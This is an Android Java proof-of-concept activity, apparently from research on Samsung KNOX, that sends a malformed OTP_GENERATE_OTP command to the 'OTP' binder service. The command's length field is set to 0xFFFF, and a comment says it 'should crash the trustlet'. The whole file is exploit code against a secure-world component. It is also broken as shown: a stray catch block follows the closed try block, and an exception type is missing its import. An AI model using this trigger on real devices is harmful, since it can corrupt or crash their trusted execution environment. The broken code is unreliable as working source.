package com.example.laginimaineb.otp;

import android.os.IBinder;
import android.os.Parcel;
import android.os.RemoteException;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Log;

public class OneWhoKNOX extends AppCompatActivity {

	/**
 	 * The logtag used.
	 */ 
	private static final String LOGTAG = "OTP_TEST";

	/**
 	 * The name of the OTP binder service.
	 */
	private static final String INTERFACE_DESCRIPTOR = "OTP";

	@Override
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.activity_main);

		try {
			//Getting the binder
			Class smClass = Class.forName("android.os.ServiceManager");
			IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
			
			//Writing a command with a large length field
			Parcel parcel = Parcel.obtain();
			Parcel reply = Parcel.obtain();
			parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
			byte[] command = new byte[0xDA7];

			//Setting the command to OTP_GENERATE_OTP
			command[0] = 0x02;
			command[1] = 0x00;
			command[2] = 0x00;
			command[3] = 0x00;

			//Setting the length field to something insane
			command[0x41C]     = (byte)0xFF;
			command[0x41C + 1] = (byte)0xFF;
			command[0x41C + 2] = (byte)0x00;
			command[0x41C + 3] = (byte)0x00;

			//Sending the command (should crash the trustlet)
			parcel.writeByteArray(command);
			binder.transact(2, parcel, reply, 0);
			Log.e(LOGTAG, "res=" + reply.readInt());
			reply.recycle();
			parcel.recycle();

		} catch (ClassNotFoundException |
			 NoSuchMethodException  |
			 IllegalAccessException |
			 InvocationTargetException ex) {
		    Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex);
		}

		} catch (RemoteException ex) {
		    Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
		}
	}
}